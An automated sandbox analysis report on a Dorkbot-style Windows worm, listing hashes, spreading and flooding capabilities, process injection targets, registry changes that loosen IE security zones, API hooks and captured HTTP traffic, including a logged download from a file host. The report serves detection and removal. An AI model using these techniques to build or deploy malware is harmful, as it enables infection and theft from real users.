Trojan.Win32.VBKrypt.unsf (Kaspersky), Trojan.GenericKD.1593098 (B) (Emsisoft), Trojan.GenericKD.1593098 (AdAware), Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)
Behaviour: Banker, Trojan, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 407a7b5eae7286859b445a4f21a126a6
SHA1: 59de4956229156bd0f9df2b6e379db04ebf1676e
SHA256: 6a9735df90ec7bf48c8c2bbe94325a18db0abe7aa9e952f567b11f1b053ea9f5
SSDeep: 3072:He/IDF9s7K21jmSMiaWbeMt2CxkDx9vcLaL3l:He/SF9s7ZTMIbeMt2PDx9vZDl
Size: 160368 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, MicrosoftVisualBasicv50v60
Company: Firseria
Created at: 2012-07-12 18:55:20
Analyzed on: WindowsXP SP3 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
IRCBot | A bot can communicate with command and control servers via IRC channel. |
MSNWorm | A worm can spread its copies through the MSN Messenger. |
DNSBlocker | A program can block designated DNS servers to make it difficult for users to locate specific domains or web sites on the Internet. |
UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. It is then notified when a USB device is plugged in, and the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Worm creates the following process(es):
2.exe:1612
%original file name%.exe:404
%original file name%.exe:772
The Worm injects its code into the following process(es):
wuauclt.exe:1792
2.exe:1240
spoolsv.exe:1436
vmacthlp.exe:924
csrss.exe:688
winlogon.exe:712
services.exe:756
Explorer.EXE:888
svchost.exe:936
svchost.exe:1020
svchost.exe:1104
svchost.exe:1164
svchost.exe:1244
wmiprvse.exe:1352
jqs.exe:1592
File activity
The process 2.exe:1240 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (3941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Poemas[1].htm (50506 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_13[1].gif (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\CSS.Sitio[1].css (10973 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ii_13[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\facebook[1].png (502 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_84[1].gif (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\560[1].png (330 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\st[1] (4627 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_82[1].gif (354 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\vineta[1].gif (87 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (1596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_02[1].gif (3521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\twitter[1].png (608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\videos_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i-2i[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\568[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i.f06[1].gif (277 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[4].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\Principal[1].js (5401 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[1].html?s=300x250&M=5&r=0 (719 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\imp[2].html?s=300x250&M=5&r=0 (711 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_86[1].gif (355 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[1] (337 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Latinoamericanas[1].htm (36234 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[2].txt (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i_58[1].gif (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_28[1].gif (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i_26[1].gif (573 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\567[1].png (324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\e_17[1].gif (130 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\c83b510be812cec3ea3446015eb76621[1].gif (4984 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (5605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\Funciones[1].js (3449 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\fa1b6b9794e5b240bbad703d9f4c9a12[1].png (4434 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\swfobject[1].js (6753 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\f[1].gif (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\-4524f[1].gif (110 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\fondo_icos[1].gif (153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\i-21[1].gif (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\lyrics_ico[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\st[1] (2871 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (162 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\pixel[3].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\c5f8760e7af5ff75c20de7295e421a6f[1].png (1529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\i_08[1].gif (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i-play[1].gif (393 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\pixel[2].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\syij4[1].gif (351 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\st[2] (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (382 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (26028 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (5030 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\esmusicon[1].htm (50961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CSS.Panel[1].css (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\principal[1].swf (16315 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[2].js (1677 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (3755 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ii_14[1].gif (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\mi.2papa[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\i.b07[1].gif (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\i_15[1].gif (156 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CA416Z8D.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[2].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[1].html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\imp[1].html?s=300x250&M=5&r=0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\2454[3].html (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ads.yahoo[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2454[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\ga[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yahoo[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@esmusicon[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CAOP2XPQ.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\esmusicon[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\CA4TMZWD.gif (0 bytes)
Registry activity
The process 2.exe:1240 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "2.exe"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "16708456"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 98 7C 23 29 F8 DC 07 A4 10 E6 54 0A 97 77 40"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Worm modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 2.exe:1612 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 AC 10 22 2A 81 8C F2 12 F6 6B BA 5B 79 0F EA"
The process %original file name%.exe:404 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 67 77 ED 66 3B 5C D6 08 5F F1 57 45 42 B2 FA"
The process %original file name%.exe:772 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 83 1C E6 F9 A8 ED B7 4E A7 47 02 40 32 B0 F3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
MD5 | File path |
---|---|
d94da84045124ec63a2790ba9a89f807 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\1.tmp |
635e78b303136a15a6a8ea03b857e4c1 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\2.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetWriteFile
HttpSendRequestA
The Worm installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Worm installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Worm installs the following user-mode hooks in kernel32.dll:
MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA
The Worm installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.
A program can register a device notification with the help of RegisterDeviceNotification. It is then notified when a USB device is plugged in, and the worm copies itself to the USB device plugged into the affected computer.
A worm can spread its copies through the MSN Messenger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
2.exe:1612
%original file name%.exe:404
%original file name%.exe:772
- Delete the original Worm file.
- Delete or disinfect the files created/modified by the Worm (see the list under File activity).
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 39953 | 40960 | 4.02467 | 5a1e4cb8210fdbb00982f6d5eca8c55f |
.data | 45056 | 8448 | 4096 | 0 | 620f0b67a91f7f74151bc5be745b7110 |
.rsrc | 57344 | 2066 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 5
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /ga.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 02:16:24 GMT
Expires: Mon, 21 Apr 2014 14:16:24 GMT
Last-Modified: Thu, 10 Apr 2014 18:45:31 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15798
Age: 34865
Cache-Control: public, max-age=43200
Alternate-Protocol: 80:quic
GET /__utm.gif?utmwv=5.5.0&utms=1&utmn=1057111011&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=941485037&utmr=-&utmp=/Poemas/&utmht=1398081328964&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Mon, 14 Apr 2014 17:12:35 GMT
Server: Golfe2
Content-Length: 35
Age: 585894
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Alternate-Protocol: 80:quic
GET /__utm.gif?utmwv=5.5.0&utms=2&utmn=1447428280&utmhn=esmusicon.com&utmcs=utf-8&utmsr=1276x846&utmvp=1256x842&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=Musica Online&utmhid=200558968&utmr=-&utmp=/&utmht=1398081346167&utmac=UA-36210330-1&utmcc=__utma=127640345.1684967166.1398081329.1398081329.1398081329.1;+__utmz=127640345.1398081329.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.google-analytics.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Mon, 14 Apr 2014 17:12:35 GMT
Server: Golfe2
Content-Length: 35
Age: 585911
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Alternate-Protocol: 80:quic
GET /download/bg4jdeppib94ych/empileque.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: VVV.mediafire.com
HTTP/1.1 302
Date: Mon, 21 Apr 2014 11:57:17 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Cache-control: no-cache
Expires: 0
Location: hXXp://download627.mediafire.com/wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg
Pragma: no-cache
Set-Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc; expires=Mon, 21-Mar-2016 11:57:17 GMT; path=/; domain=.mediafire.com; httponly
Server: MediaFire
Access-Control-Allow-Origin: *
GET /Poemas/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130866
Last-Modified: Mon, 07 Apr 2014 17:00:48 GMT
Connection: keep-alive
ETag: "5342d9c0-1ff32"
Accept-Ranges: bytes
GET /Js/Principal.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 6765
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1a6d"
Accept-Ranges: bytes
GET /Js/swfobject.js HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 8880
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-22b0"
Accept-Ranges: bytes
GET /Imagenes/i.b07.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: image/gif
Content-Length: 762
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-2fa"
Accept-Ranges: bytes
GET /principal.swf HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: hXXp://esmusicon.com/Poemas/
x-flash-version: 11,6,602,168
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:28 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 116150
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1c5b6"
Accept-Ranges: bytes
GET /Imagenes/i_26.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
